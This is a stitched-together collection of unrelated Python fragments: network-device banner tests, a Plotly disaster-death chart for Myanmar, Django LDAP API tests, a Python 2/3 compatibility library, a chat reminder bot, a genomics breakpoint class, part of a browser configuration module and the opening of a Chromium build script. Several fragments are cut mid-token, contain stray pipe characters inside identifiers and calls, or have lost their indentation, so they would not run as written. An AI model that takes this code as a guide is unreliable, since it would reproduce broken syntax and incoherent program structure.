            self.assertIn(banner_value, dut.running_config)
            banner_api_value = random_string()
            resp = dut.api('system').set_banner("motd", banner_api_value)
            self.assertTrue(resp, 'dut=%s' % dut)
            self.assertIn(banner_api_value, dut.running_config)
    def test_set_banner_motd_donkey(self):
        """A large multiline ASCII-art banner is stored verbatim."""
        for dut in self.duts:
            donkey_chicken = r"""
 /\          /\
( \\        // )
 \ \\      // /
  \_\\||||//_/
   \/ _  _ \
  \/|(o)(O)|
 \/ |      |
  ___________________\/  \      /
 //                //     |____|      Cluck cluck cluck!
//                ||     /      \
//|                \|     \ 0  0 /
// \       )         V    / \____/
//   \     /        (     /
""    \   /_________|  |_/
      /  /\   /     |  ||
     /  / /  /      \  ||
     | |  | |        | ||
     | |  | |        | ||
     |_|  |_|        |_||
      \_\  \_\        \_\\
"""
            resp = dut.api('system').set_banner("motd", donkey_chicken)
            self.assertTrue(resp, 'dut=%s' % dut)
            self.assertIn(donkey_chicken, dut.running_config)
    def test_set_banner_motd_default(self):
        """set_banner('motd', None, True) removes the motd banner."""
        for dut in self.duts:
            dut.config([dict(cmd="banner motd",
                             input="!!!!REMOVE BANNER TEST!!!!")])
            dut.api('system').set_banner('motd', None, True)
            self.assertIn('no banner motd', dut.running_config)
def test_set_banner_login(self):
for dut in self.duts:
banner_value = random_string( | )
dut.config([dict(cmd="banner login",
input=banner_value)])
self.assertIn(banner_value, dut.running_config)
banner_api_value = random_string()
resp = dut.api('system').set_banner("login", banner_api_value)
self.assertTrue(resp, 'dut=%s' % dut)
self.assertIn(banner_api_value, dut.running_config)
config_login_banner = dut.api('system') | .get()['banner_login']
sel |
"""Import Module Plotly To Ploting Graph"""
import plotly.plotly as py
import plotly.graph_objs as go
"""Open and Read CSV from database"""
data = open('Real_Final_database_02.csv')
alldata = data.readlines()
listdata = []
for i in alldata:
listdata.append(i.strip().split(','))
type_z = ['Flood', 'Epidemic', 'Drought', 'Earthquake', 'Storm']
size = [22, 19, 10, 7, 5]
fill_colors = ['#00d0f5', '#ff4a2e', 'a36800', '#ad9900', '#8b00db']
trace = []
"""Select and Set variable Data affect that happen in each disaster in Myanmar"""
for i in range(5):
year_x = []
death_z = []
types_y = []
for j in listdat | a:
if j[0] == 'Myanmar' and j[2] == type_z[i]:
year_x.append(int(j[1]))
death_z.append(int(j[5]))
types_y.append(type_z[i])
trace.append(go.Scatter(x = year_x, y = death_z, name = type_z[i],
line = dict(color = fill_colors[i], width = 2),
marker=dict(symbol = 'circle',
| sizemode = 'diameter',
sizeref = 0.85,
size = size[i],
line = dict(width = 2))))
data = trace
"""Part of code that adjust layout of graph"""
layout = go.Layout(title = 'Total Damage',
yaxis = dict(title = 'Total Damage',
titlefont = dict(color = '#ff2323'),
tickfont = dict(color = '#ff2323')),
paper_bgcolor = 'rgb(245, 245, 245)',
plot_bgcolor = 'rgb(245, 245, 245)')
"""Part of plot graph in plotly"""
fig = go.Figure(data=data, layout=layout)
plot_url = py.plot(fig, filename='Total_Death_in_Myanmar') |
import json
import mock
from django.test import TestCase
from django.core.urlresolvers import reverse
class TestAPI(TestCase):
    """HTTP API tests with the LDAP connection fully mocked out."""
    @mock.patch('ldap.initialize')
    def test_exists(self, mocked_initialize):
        # The mocked connection's search_s drives all LDAP responses.
        connection = mock.MagicMock()
        mocked_initialize.return_value = connection
        url = reverse('api:exists')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 400)
        # check that 400 Bad Request errors are proper JSON
        self.assertEqual(response['Content-Type'], 'application/json')
        self.assertEqual(
            json.loads(response.content),
            {'error': "missing key 'mail'"}
        )
        # An empty mail parameter is also a Bad Request.
        response = self.client.get(url, {'mail': ''})
        self.assertEqual(response.status_code, 400)
        result = {
            'abc123': {'uid': 'abc123', 'mail': 'peter@example.com'},
        }
        def search_s(base, scope, filterstr, *args, **kwargs):
            # Only the known address yields a match.
            if 'peter@example.com' in filterstr:
                # if 'hgaccountenabled=TRUE' in filterstr:
                #     return []
                return result.items()
            return []
        connection.search_s.side_effect = search_s
        response = self.client.get(url, {'mail': 'peter@example.com'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json')
        self.assertEqual(json.loads(response.content), True)
        response = self.client.get(url, {'mail': 'never@heard.of.com'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.content), False)
        # response = self.client.get(url, {'mail': 'peter@example.com',
        #                                  'hgaccountenabled': ''})
        # self.assertEqual(response.status_code, 200)
        # self.assertEqual(json.loads(response.content), False)
        # Extra query parameters are passed through without breaking lookup.
        response = self.client.get(url, {'mail': 'peter@example.com',
                                         'gender': 'male'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.content), True)
    @mock.patch('ldap.initialize')
    def test_employee(self, mocked_initialize):
        # Same mocking pattern as test_exists, against the employee endpoint.
        connection = mock.MagicMock()
        mocked_initialize.return_value = connection
        url = reverse('api:employee')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 400)
        response = self.client.get(url, {'mail': ''})
        self.assertEqual(response.status_code, 400)
        result = {
            'abc123': {'uid': 'abc123',
                       'mail': 'peter@mozilla.com',
                       'sn': u'B\xe3ngtsson'},
        }
        def search_s(base, scope, filterstr, *args, **kwargs):
            if 'peter@example.com' in filterstr:
                return result.items()
            return []
        connection.search_s.side_effect = search_s
        response = self.client.get(url, {'mail': 'peter@example.com'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json')
        self.assertEqual(json.loads(response.content), True)
        response = self.client.get(url, {'mail': 'never@heard.of.com'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response['Content-Type'], 'application/json')
        self.assertEqual(json.loads(response.content), False)
    @mock.patch('ldap.initialize')
    def test_ingroup(self, mocked_initialize):
        # Group-membership endpoint requires both 'mail' and 'cn'.
        connection = mock.MagicMock()
        mocked_initialize.return_value = connection
        url = reverse('api:in-group')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 400)
        response = self.client.get(url, {'mail': ''})
        self.assertEqual(response.status_code, 400)
        response = self.client.get(url, {'mail': 'peter@example.com'})
        self.assertEqual(response.status_code, 400)
        response = self.client.get(url, {'mail': 'peter@example.com',
                                         'cn': ''})
        self.assertEqual(response.status_code, 400)
        result = {
            'abc123': {'uid': 'abc123', 'mail': 'peter@example.com'},
        }
        def search_s(base, scope, filterstr, *args, **kwargs):
            # Group searches (base contains ou=groups) only match the known
            # user inside the CrashStats group; other searches are basic
            # user lookups.
            if 'ou=groups' in base:
                if (
                    'peter@example.com' in filterstr and
                    'cn=CrashStats' in filterstr
                ):
                    return result.items()
            else:
                # basic lookup
                if 'peter@example.com' in filterstr:
                    return result.items()
            return []
        connection.search_s.side_effect = search_s
        response = self.client.get(url, {'mail': 'not@head.of.com',
                                         'cn': 'CrashStats'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.content), False)
        response = self.client.get(url, {'mail': 'peter@example.com',
                                         'cn': 'CrashStats'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.content), True)
        response = self.client.get(url, {'mail': 'peter@example.com',
                                         'cn': 'NotInGroup'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.content), False)
|
3: OLD_UNICODE = None
else: OLD_UNICODE = unicode #@UndefinedVariable
# Tuples of "string-like" and integer types per interpreter version.
if PYTHON_3: STRINGS = (str,)
else: STRINGS = (str, unicode) #@UndefinedVariable
if PYTHON_3: ALL_STRINGS = (bytes, str)
else: ALL_STRINGS = (bytes, str, unicode) #@UndefinedVariable
if PYTHON_3: INTEGERS = (int,)
else: INTEGERS = (int, long) #@UndefinedVariable
# saves a series of global symbols that are going to be
# used latter for some of the legacy operations
_ord = ord
_chr = chr
_str = str
_bytes = bytes
_range = range
try: _xrange = xrange #@UndefinedVariable
except Exception: _xrange = None
# HTTP client aliases: urllib/http.client on py3, urllib2/httplib on py2.
if PYTHON_3: Request = urllib.request.Request
else: Request = urllib2.Request
if PYTHON_3: HTTPHandler = urllib.request.HTTPHandler
else: HTTPHandler = urllib2.HTTPHandler
if PYTHON_3: HTTPError = urllib.error.HTTPError
else: HTTPError = urllib2.HTTPError
if PYTHON_3: HTTPConnection = http.client.HTTPConnection #@UndefinedVariable
else: HTTPConnection = httplib.HTTPConnection
if PYTHON_3: HTTPSConnection = http.client.HTTPSConnection #@UndefinedVariable
else: HTTPSConnection = httplib.HTTPSConnection
# Builtins removed in py3 fall back to None on import failure.
try: _execfile = execfile #@UndefinedVariable
except Exception: _execfile = None
try: _reduce = reduce #@UndefinedVariable
except Exception: _reduce = None
try: _reload = reload #@UndefinedVariable
except Exception: _reload = None
try: _unichr = unichr #@UndefinedVariable
except Exception: _unichr = None
def with_meta(meta, *bases):
    """Build an anonymous class named "Class" from *bases* using the
    metaclass *meta*, a version portable metaclass hook."""
    return meta("Class", bases, {})
def eager(iterable):
    """Materialize *iterable* into a concrete list under python 3;
    python 2 values are returned untouched (already eager)."""
    if not PYTHON_3: return iterable
    return list(iterable)
def iteritems(associative):
    """Return a lazy (key, value) iterator for *associative*, portable
    across python versions."""
    if not PYTHON_3: return associative.iteritems()
    return associative.items()
def iterkeys(associative):
    """Return a lazy key iterator for *associative*, portable across
    python versions."""
    if not PYTHON_3: return associative.iterkeys()
    return associative.keys()
def itervalues(associative):
    """Return a lazy value iterator for *associative*, portable across
    python versions."""
    if not PYTHON_3: return associative.itervalues()
    return associative.values()
def items(associative):
    """Return the (key, value) pairs of *associative* as a concrete list."""
    if not PYTHON_3: return associative.items()
    return eager(associative.items())
def keys(associative):
    """Return the keys of *associative* as a concrete list."""
    if not PYTHON_3: return associative.keys()
    return eager(associative.keys())
def values(associative):
    """Return the values of *associative* as a concrete list."""
    if not PYTHON_3: return associative.values()
    return eager(associative.values())
def xrange(start, stop = None, step = 1):
    """Lazy integer range, portable across python versions.

    Fixes the original truthiness test on ``stop``, which treated a
    ``stop`` of ``0`` as absent and so broke calls such as
    ``xrange(5, 0, -1)``; also makes the python 2 single-argument path
    use ``_xrange`` (lazy) instead of ``_range`` (eager) for consistency.
    """
    if stop is None:
        return _range(start) if PYTHON_3 else _xrange(start)
    if PYTHON_3: return _range(start, stop, step)
    return _xrange(start, stop, step)
def range(start, stop = None, step = None):
    """Eager (list) integer range, portable across python versions.

    Fixes two defects in the original: ``step = None`` was forwarded to
    the builtin (raising ``TypeError`` on e.g. ``range(1, 5)``) and a
    ``stop`` of ``0`` was treated as absent due to a truthiness test.
    """
    if stop is None: result = _range(start)
    elif step is None: result = _range(start, stop)
    else: result = _range(start, stop, step)
    if PYTHON_3: return eager(result)
    return result
def ord(value):
    """Version tolerant ``ord``: iterating bytes on python 3 already
    yields integers, which are passed through unchanged."""
    already_int = PYTHON_3 and type(value) == int
    return value if already_int else _ord(value)
def chr(value):
    """Convert *value* into its single-byte representation: a bytes
    object under python 3, a native string under python 2."""
    if PYTHON_3:
        return _bytes([value])
    return _chr(value) if type(value) in INTEGERS else value
def chri(value):
    """Identity under python 3; under python 2 converts integers into
    their character via ``chr`` and passes anything else through."""
    if not PYTHON_3 and type(value) in INTEGERS:
        return _chr(value)
    return value
def bytes(value, encoding = "latin-1", errors = "strict", force = False):
    """Coerce *value* into a bytes object using *encoding* (python 3
    only, unless *force* is set); ``None`` and existing bytes values are
    returned unchanged.

    Fix: the null check now uses identity (``is None``) instead of
    equality, which could misfire for objects overriding ``__eq__``.
    """
    if not PYTHON_3 and not force: return value
    if value is None: return value
    if type(value) == _bytes: return value
    return value.encode(encoding, errors)
def str(value, encoding = "latin-1", errors = "strict", force = False):
    """Coerce *value* into a native string using *encoding* (python 3
    only, unless *force* is set); ``None`` and existing strings are
    returned unchanged.

    Fix: the null check now uses identity (``is None``) instead of
    equality, which could misfire for objects overriding ``__eq__``.
    """
    if not PYTHON_3 and not force: return value
    if value is None: return value
    if type(value) in STRINGS: return value
    return value.decode(encoding, errors)
def u(value, encoding = "utf-8", errors = "strict", force = False):
    """Coerce *value* into a unicode string using *encoding* (python 2
    only, unless *force* is set); ``None`` and unicode values are
    returned unchanged.

    Fix: the null check now uses identity (``is None``) instead of
    equality, which could misfire for objects overriding ``__eq__``.
    """
    if PYTHON_3 and not force: return value
    if value is None: return value
    if type(value) == UNICODE: return value
    return value.decode(encoding, errors)
def ascii(value, encoding = "utf-8", errors = "replace"):
    """Best-effort conversion of *value* into a plain ASCII native
    string, decoding bytes with *encoding* first and replacing any
    character that cannot be represented."""
    text = value.decode(encoding, errors) if is_bytes(value) else UNICODE(value)
    encoded = text.encode("ascii", errors)
    return str(encoded)
def orderable(value):
    """Wrap *value* in Orderable under python 3 so heterogeneous
    comparisons keep working; python 2 orders natively."""
    return Orderable(value) if PYTHON_3 else value
def is_str(value):
    """Tell whether *value* is exactly the native ``str`` type
    (subclasses do not count)."""
    return _str == type(value)
def is_unicode(value):
    """Tell whether *value* is a unicode string for the running
    interpreter (``str`` on python 3, ``unicode`` on python 2)."""
    expected = _str if PYTHON_3 else unicode #@UndefinedVariable
    return type(value) == expected
def is_bytes(value):
    """Tell whether *value* is a byte string for the running interpreter
    (``bytes`` on python 3, ``str`` on python 2)."""
    expected = _bytes if PYTHON_3 else _str
    return type(value) == expected
def is_string(value, all = False):
    """Tell whether *value* is a string; with ``all`` set, byte strings
    are accepted as well."""
    return type(value) in (ALL_STRINGS if all else STRINGS)
def is_generator(value):
    """Heuristic test for generator-like values: real generators,
    ``itertools.chain`` objects, or anything flagged with a
    ``_is_generator`` attribute."""
    return (
        inspect.isgenerator(value)
        or type(value) in (itertools.chain,)
        or hasattr(value, "_is_generator")
    )
def is_async_generator(value):
    """Tell whether *value* is an async generator; always False on
    interpreters whose ``inspect`` lacks ``isasyncgen``."""
    if hasattr(inspect, "isasyncgen"):
        return inspect.isasyncgen(value)
    return False
def is_unittest(name = "unittest"):
    """Heuristically determine whether the current call originates from a
    unit test, by scanning the source lines of the active stack for *name*.

    Fix: ``inspect.stack()`` frames may carry ``None`` as their code
    context (e.g. when source is unavailable); the original iterated it
    unconditionally and raised ``TypeError``.
    """
    for stack_frame in inspect.stack():
        context = stack_frame[4]
        if not context: continue
        for program_line in context:
            if name in program_line: return True
    return False
def execfile(path, global_vars, local_vars = None, encoding = "utf-8"):
    """Portable replacement for the ``execfile`` builtin removed in
    python 3: reads, compiles and executes *path* with the given globals
    and locals (locals default to the globals mapping).

    Fixes the ``== None`` comparison and uses a ``with`` block so the
    file handle cannot leak.
    """
    if local_vars is None: local_vars = global_vars
    if not PYTHON_3: return _execfile(path, global_vars, local_vars)
    with open(path, "rb") as file:
        data = file.read()
    code = compile(data.decode(encoding), path, "exec")
    exec(code, global_vars, local_vars) #@UndefinedVariable
def walk(path, visit, arg):
    """Emulation of the legacy ``os.path.walk`` interface on top of
    ``os.walk``: calls ``visit(arg, dirname, names)`` for every directory
    under *path*; the callback may mutate *names* to prune sub-directories
    from the traversal.

    Fix: replaces the side-effecting ``not exists and dirs.remove(dir)``
    expression (which also shadowed the ``dir`` builtin) with an explicit
    conditional.
    """
    for root, dirs, _files in os.walk(path):
        names = os.listdir(root)
        visit(arg, root, names)
        # iterate over a copy, as pruning mutates the original list
        for entry in list(dirs):
            if entry not in names:
                dirs.remove(entry)
def getargspec(func):
    """Portable argspec retrieval: prefers the modern ``getfullargspec``
    and narrows its result to the four legacy fields."""
    if not hasattr(inspect, "getfullargspec"):
        return inspect.getargspec(func)
    return ArgSpec(*inspect.getfullargspec(func)[:4])
def reduce(*args, **kwargs):
    """Version portable ``reduce``: dispatches to ``functools.reduce``
    on python 3 and to the captured builtin on python 2."""
    target = functools.reduce if PYTHON_3 else _reduce
    return target(*args, **kwargs)
def reload(*args, **kwargs):
    """Version portable ``reload``: dispatches to ``imp.reload`` on
    python 3 and to the captured builtin on python 2."""
    target = imp.reload if PYTHON_3 else _reload
    return target(*args, **kwargs)
def unichr(*args, **kwargs):
    """Version portable ``unichr``: python 3's ``chr`` already returns
    unicode, python 2 uses the captured ``unichr`` builtin."""
    target = _chr if PYTHON_3 else _unichr
    return target(*args, **kwargs)
def urlopen(*args, **kwargs):
    """Open a URL through the proper module for the running interpreter."""
    if not PYTHON_3:
        return urllib2.urlopen(*args, **kwargs) #@UndefinedVariable
    return urllib.request.urlopen(*args, **kwargs)
def build_opener(*args, **kwargs):
    """Build a URL opener through the proper module for the running
    interpreter."""
    if not PYTHON_3:
        return urllib2.build_opener(*args, **kwargs) #@UndefinedVariable
    return urllib.request.build_opener(*args, **kwargs)
def urlparse(*args, **kwargs):
    """Thin proxy over the version-selected urlparse module."""
    return _urlparse.urlparse(*args, **kwargs)
def urlunparse(*args, **kwargs):
    """Thin proxy over the version-selected urlparse module."""
    return _urlparse.urlunparse(*args, **kwargs)
def parse_qs(*args, **kwargs):
    """Thin proxy over the version-selected urlparse module."""
    return _urlparse.parse_qs(*args, **kwargs)
def urlencode(*args, **kwargs):
    """Encode a query string through the proper module for the running
    interpreter."""
    if not PYTHON_3:
        return urllib.urlencode(*args, **kwargs) #@UndefinedVariable
    return urllib.parse.urlencode(*args, **kwargs)
def quote(*args, **kwargs):
    """URL-quote a value through the proper module for the running
    interpreter."""
    if not PYTHON_3:
        return urllib.quote(*args, **kwargs) #@UndefinedVariable
    return urllib.parse.quote(*args, **kwargs)
def quote_plus(*args, **kwargs):
    """URL-quote a value (spaces as ``+``) through the proper module for
    the running interpreter."""
    if not PYTHON_3:
        return urllib.quote_plus(*args, **kwargs) #@UndefinedVariable
    return urllib.parse.quote_plus(*args, **kwargs)
def unquote(*args, **kwargs):
    """URL-unquote a value through the proper module for the running
    interpreter."""
    if not PYTHON_3:
        return urllib.unquote(*args, **kwargs) #@UndefinedVariable
    return urllib.parse.unquote(*args, **kwargs)
def unquote_plus(*args, **kwargs):
| if PYTHON_3: return urllib.parse.unquote_plus(*args, **kwargs)
else: return urllib.unquot | e_plus(*args, **kwargs) #@UndefinedVariable
def cmp_to_key(*args, **kwargs):
    """Build the keyword mapping that passes a comparison function to
    ``sort`` in a version portable way (``key`` on python 3, ``cmp`` on
    python 2)."""
    if not PYTHON_3:
        return dict(cmp = args[0])
    return dict(key = functools.cmp_to_key(*args, **kwargs)) #@UndefinedVariable
def tobytes(self, *args, **kwargs):
    """Serialize *self* through the best available method: ``tobytes``
    on python 3, the legacy ``tostring`` otherwise."""
    target = self.tobytes if PYTHON_3 else self.tostring
    return target(*args, **kwargs)
def tostring(self, *args, **kwargs):
|
# -*- coding: utf-8 | -*-
"""Functional tes | ts using WebTest.
See: http://webtest.readthedocs.org/
"""
|
import json
import time
import sched
from api import send_message
# single global scheduler driving the periodic reminder checks
scheduler = sched.scheduler(time.time, time.sleep)
def load_reminders():
    """Load the reminder store from ``data/reminders.json``.

    On any read/parse failure an empty store is written back so later
    calls succeed. Fix: the recovery write previously crashed when the
    ``data`` directory itself was missing; it is now created on demand.
    """
    import os
    reminders = {}
    try:
        with open("data/reminders.json") as fp:
            reminders = json.load(fp)
    except Exception:
        os.makedirs("data", exist_ok=True)
        with open("data/reminders.json", "w") as fp:
            json.dump(reminders, fp, indent=4)
    return reminders
def save_reminders(reminders):
    """Serialize the complete reminder mapping to the JSON store."""
    with open("data/reminders.json", "w") as handle:
        json.dump(reminders, handle, indent=4)
def list_reminders(chat):
    """Return a human-readable listing of the reminders stored for *chat*.

    Fix: the original indexed ``reminders[chat]`` directly and raised
    ``KeyError`` for chats with no stored reminders; an empty string is
    now returned instead.
    """
    chat = str(chat)
    reminders = load_reminders().get(chat, {})
    msg = ""
    for stamp in reminders:
        futuretime = time.localtime(float(stamp))
        msg += time.strftime("%d/%m/%y as %H:%M:%S", futuretime) + ": " + reminders[stamp] + "\n"
    return msg
def add_reminder(chat, date, message):
    """Persist one reminder (*message* due at timestamp *date*) for *chat*.

    Fix: replaces the ``assert`` sanity check (silently stripped under
    ``python -O``) with an explicit type check, and uses ``setdefault``
    instead of a membership test plus assignment.
    """
    chat = str(chat)
    reminders = load_reminders()
    if not isinstance(reminders, dict):
        raise TypeError("reminder store must be a dict")
    reminders.setdefault(chat, {})[date] = message
    save_reminders(reminders)
def check_time():
    """Deliver every due reminder, prune it from the store, and re-arm
    the scheduler for the next tick.

    Fix: the original ``break`` after the first expired entry delivered
    at most one reminder per chat per tick and stopped scanning that
    chat; iterating over a snapshot handles all due reminders at once
    and still allows safe removal.
    """
    reminders = load_reminders()
    changed = False
    for chat in reminders:
        for date in list(reminders[chat]):
            if float(date) < time.time():
                send_message(chat, "O MEU JA DEU ORA D " + reminders[chat][date])
                reminders[chat].pop(date)
                changed = True
    if changed:
        save_reminders(reminders)
    scheduler.enter(1, 1, check_time)
def on_msg_received(msg, matches):
    """Handle an incoming reminder command.

    With no captured groups at all, lists the chat's reminders; otherwise
    parses the optional day/hour/minute/second components, stores the
    reminder and confirms it to the chat.

    Fix: the four near-identical unit-parsing branches are collapsed into
    a single table-driven loop.
    """
    chat = msg["chat"]["id"]
    days = matches.group(1)
    hours = matches.group(2)
    minutes = matches.group(3)
    seconds = matches.group(4)
    message = matches.group(5)
    if days is None and hours is None and minutes is None and seconds is None and message is None:
        # bare command: just list what is currently stored
        send_message(chat, list_reminders(chat))
        return
    timeoffset = 0
    # (captured value, unit suffix to strip, seconds per unit)
    for value, suffix, factor in ((days, "d", 86400), (hours, "h", 3600),
                                  (minutes, "m", 60), (seconds, "s", 1)):
        if value is not None:
            timeoffset += factor * int(value.lower().replace(suffix, ""))
    if message is None:
        message = "auguna cosa"
    futuretime = time.time() + timeoffset
    if "username" in msg["from"]:
        message += " blz @" + msg["from"]["username"]
    add_reminder(chat, futuretime, message)
    futuretime = time.localtime(futuretime)
    response = "belesinhaaaaa vo lenbra dia " + time.strftime("%d/%m/%y as %H:%M:%S", futuretime) + " sobr \"" + message + "\""
    send_message(chat, response)
def run():
    """Start the reminder loop: arm the first periodic check and block
    forever in the scheduler."""
    scheduler.enter(1, 1, check_time)
    scheduler.run()
|
'''
Created on Jun 11, 2011
@author: mkiyer
'''
class Breakpoint(object):
    """A putative fusion breakpoint: the 5' and 3' flanking sequences
    around the junction plus the names of the chimeras sharing it."""

    def __init__(self):
        self.name = None
        self.seq5p = None
        self.seq3p = None
        self.chimera_names = []

    @property
    def pos(self):
        """Return position of break along sequence measured from 5' -> 3'."""
        return len(self.seq5p)

    @staticmethod
    def from_list(fields):
        """Build a Breakpoint from a parsed text row (inverse of to_list)."""
        bp = Breakpoint()
        bp.name = fields[0]
        bp.seq5p, bp.seq3p = fields[1], fields[2]
        bp.chimera_names = fields[3].split(',')
        return bp

    def to_list(self):
        """Serialize back to the row format accepted by from_list."""
        return [self.name, self.seq5p, self.seq3p,
                ','.join(self.chimera_names)]
se:
bindings = self.get_bindings_for(mode)
return bindings.get(key, None)
def bind(self,
key: keyutils.KeySequence,
command: str, *,
mode: str,
save_yaml: bool = False) -> None:
"""Add a new binding from key to command."""
if not command.strip():
raise configexc.KeybindingError(
"Can't add binding '{}' with empty command in {} "
'mode'.format(key, mode))
self._validate(key, mode)
log.keyboard.vdebug( # type: ignore[attr-defined]
"Adding binding {} -> {} in mode {}.".format(key, command, mode))
bindings = self._config.get_mutable_obj('bindings.commands')
if mode not in bindings:
bindings[mode] = {}
bindings[mode][str(key)] = command
self._config.update_mutables(save_yaml=save_yaml)
def bind_default(self,
key: keyutils.KeySequence, *,
mode: str = 'normal',
save_yaml: bool = False) -> None:
"""Restore a default keybinding."""
self._validate(key, mode)
bindings_commands = self._config.get_mutable_obj('bindings.commands')
try:
del bindings_commands[mode][str(key)]
except KeyError:
raise configexc.KeybindingError(
"Can't find binding '{}' in {} mode".format(key, mode))
self._config.update_mutables(save_yaml=save_yaml)
    def unbind(self,
               key: keyutils.KeySequence, *,
               mode: str = 'normal',
               save_yaml: bool = False) -> None:
        """Unbind the given key in the given mode.

        Custom bindings are removed outright; default bindings are
        shadowed with a None entry; anything else raises KeybindingError.
        """
        self._validate(key, mode)
        bindings_commands = self._config.get_mutable_obj('bindings.commands')
        # NOTE(review): the presence check reads `val` (global config
        # accessor) while mutation targets `bindings_commands`; the lookup
        # also keys on `key` where deletion keys on str(key) — presumably
        # val's mapping is KeySequence-keyed and the mutable obj
        # str-keyed; confirm the two stay in sync.
        if val.bindings.commands[mode].get(key, None) is not None:
            # In custom bindings -> remove it
            del bindings_commands[mode][str(key)]
        elif key in val.bindings.default[mode]:
            # In default bindings -> shadow it with None
            if mode not in bindings_commands:
                bindings_commands[mode] = {}
            bindings_commands[mode][str(key)] = None
        else:
            raise configexc.KeybindingError(
                "Can't find binding '{}' in {} mode".format(key, mode))
        self._config.update_mutables(save_yaml=save_yaml)
class Config(QObject):
"""Main config object.
Class attributes:
MUTABLE_TYPES: Types returned from the config which could potentially
be mutated.
Attributes:
_values: A dict mapping setting names to configutils.Values objects.
_mutables: A dictionary of mutable objects to be checked for changes.
_yaml: A YamlConfig object or None.
Signals:
changed: Emitted with the option name when an option changed.
"""
MUTABLE_TYPES = (dict, list)
changed = pyqtSignal(str)
def __init__(self,
yaml_config: 'configfiles.YamlConfig',
parent: QObject = None) -> None:
super().__init__(parent)
self._mutables: MutableMapping[str, Tuple[Any, Any]] = {}
self._yaml = yaml_config
self._init_values()
self.yaml_loaded = False
self.config_py_loaded = False
self.warn_autoconfig = True
def _init_values(self) -> None:
"""Populate the self._values dict."""
self._values: Mapping = {}
for name, opt in configdata.DATA.items():
self._values[name] = configutils.Values(opt)
def __iter__(self) -> Iterator[configutils.Values]:
"""Iterate over configutils.Values items."""
yield from self._values.values()
def init_save_manager(self,
save_manager: 'savemanager.SaveManager') -> None:
"""Make sure the config gets saved properly.
We do this outside of __init__ because the config gets created before
the save_manager exists.
"""
self._yaml.init_save_manager(save_manager)
    def _set_value(self,
                   opt: 'configdata.Option',
                   value: Any,
                   pattern: urlmatch.UrlPattern = None,
                   hide_userconfig: bool = False) -> None:
        """Set the given option to the given value.

        Checks the active backend supports the option, validates the
        value through the option's type, stores it (optionally scoped to
        a URL pattern) and emits the changed signal.

        hide_userconfig is forwarded to Values.add — presumably it hides
        the value from user-config listings; confirm against Values.
        """
        if not isinstance(objects.backend, objects.NoBackend):
            if objects.backend not in opt.backends:
                raise configexc.BackendError(opt.name, objects.backend,
                                             opt.raw_backends)
        opt.typ.to_py(value)  # for validation
        self._values[opt.name].add(opt.typ.from_obj(value),
                                   pattern, hide_userconfig=hide_userconfig)
        self.changed.emit(opt.name)
        log.config.debug("Config option changed: {} = {}".format(
            opt.name, value))
def _check_yaml(self, opt: 'configdata.Option', save_yaml: bool) -> None:
"""Make sure the given option may be set in autoconfig.yml."""
if save_yaml and opt.no_autoconfig:
raise configexc.NoAutoconfigError(opt.name)
    def read_yaml(self) -> None:
        """Read the YAML settings from self._yaml.

        Loads the backing file, then replays every stored scoped value
        through _set_value so validation runs and change signals fire.
        """
        self._yaml.load()
        self.yaml_loaded = True
        # each item yielded by the YAML config groups the scoped values
        # for one option; each scoped value may carry a URL pattern
        for values in self._yaml:
            for scoped in values:
                self._set_value(values.opt, scoped.value,
                                pattern=scoped.pattern)
def get_opt(self, name: str) -> 'configdata.Option':
"""Get a configdata.Option object for the given setting."""
try:
return configdata.DATA[name]
except KeyError:
deleted = name in configdata.MIGRATIONS.deleted
renamed = configdata.MIGRATIONS.renamed.get(name)
exception = configexc.NoOptionError(
name, deleted=deleted, renamed=renamed)
raise exception from None
def ensure_has_opt(self, name: str) -> None:
"""Raise NoOptionError if the given setting does not exist."""
self.get_opt(name)
def get(self,
name: str,
url: QUrl = None, *,
fallback: bool = True) -> Any:
"""Get the given setting converted for Python code.
Args:
fallback: Use the global value if there's no URL-specific one.
"""
opt = self.get_opt(name)
obj = self.get_obj(name, url=url, fallback=fallback)
return opt.typ.to_py(obj)
def _maybe_copy(self, value: Any) -> Any:
"""Copy the value if it could potentially be mutated."""
if isinstance(value, self.MUTABLE_TYPES):
# For mutable objects, create a copy so we don't accidentally
# mutate the config's internal value.
return copy.deepcopy(value)
else:
# Shouldn't be mutable (and thus hashable)
assert value.__hash__ is not None, value
return value
def get_obj(self,
name: str, *,
url: QUrl = None,
fallback: bool = True) -> Any:
"""Get the given setting as object (for YAML/config.py).
Note that the returned values are not watched for mutation.
If a URL is given, return the value which should be used for that URL.
"""
self.ensure_has_opt(name)
value = self._values[name].get_for_url(url, fallback=fallback)
return self._maybe_copy(value)
def get_obj_for_pattern(
self, name: str, *,
pattern: Optional[urlmatch.UrlPattern]
) -> Any:
"""Get the given setting as object (for YAML/config.py).
This gets the overridden value for a given pattern, or
usertypes.UNSET if no such override exists.
"""
self.ensure_has_opt(name)
value = self._values[name].get_for_pattern(pattern, fallback=False)
return self._maybe_copy(value)
def get_mutable_obj(self, name: str, *,
pattern: urlmatch.UrlPattern = None) -> Any:
"""Get an object which can be mutated, e.g. in a config.py.
If a pattern is given |
#!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Gets and writes the configurations of the attached | devices.
This configuration is used by later build steps to determine which devices to
install to and what needs to be installed to those devices.
"""
import optparse
import sys
from util import build_utils
from util import build_device
def main(argv):
  """Collect configurations for attached, online, rooted devices and
  write them out for later build steps; warn about unusable devices."""
  parser = optparse.OptionParser()
  parser.add_option('--stamp', action='store')
  parser.add_option('--output', action='store')
  options, _ = parser.parse_args(argv)

  devices = build_device.GetAttachedDevices()

  device_configurations = []
  for device in devices:
    configuration, is_online, has_root = (
        build_device.GetConfigurationForDevice(device))

    if not is_online:
      build_utils.PrintBigWarning(
          '%s is not online. Skipping managed install for this device. '
          'Try rebooting the device to fix this warning.' % device)
      continue

    if not has_root:
      build_utils.PrintBigWarning(
